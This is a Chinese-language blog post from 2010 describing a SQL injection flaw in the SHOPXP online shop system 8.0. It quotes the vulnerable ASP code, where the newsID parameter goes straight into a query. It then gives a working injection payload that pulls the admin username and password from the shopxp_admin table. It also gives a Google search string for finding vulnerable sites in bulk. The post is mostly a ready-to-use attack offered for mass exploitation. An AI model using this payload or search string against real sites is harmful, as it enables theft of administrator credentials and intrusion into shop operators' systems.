Chinaunix首页 | 论坛 | 博客
  • 博客访问: 2280714
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2010-01-14 22:52:28

上次说了SHOPXP网上购物系统 7.4的注入漏洞   跟新了,看看8.0的

商城系统差不多都是互相抄的。漏洞和网趣的那个一样,不过人家加了一个枫叶的防注入,没什么用处。

在TEXTBOX2.ASP TEXTBOX3.ASP页面的newsid变量为判断

 

复制代码

  1. Action=LCase(Request.QueryString("Action"))
  2. newsID=Request.QueryString("newsID")
  3. If request("action")="modify" Then
  4. set rs=server.createobject("adodb.recordset")
  5. sql="select * from shopxp_news where newsid="&newsid
  6. rs.open sql,conn,1,1
  7.      If Not rs.Eof Then
  8.          Content=rs("newscontent")
  9.      End If
  10.      Response.Write Content
  11. End If

构造URL注入即可。

exp:

,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin

批量

google:inurl:shopxp_news.asp

阅读(598) | 评论(0) | 转发(0) |
0

上一篇:dvbbs 8.2前台0day

下一篇:祝大家新年快乐

给主人留下些什么吧!~~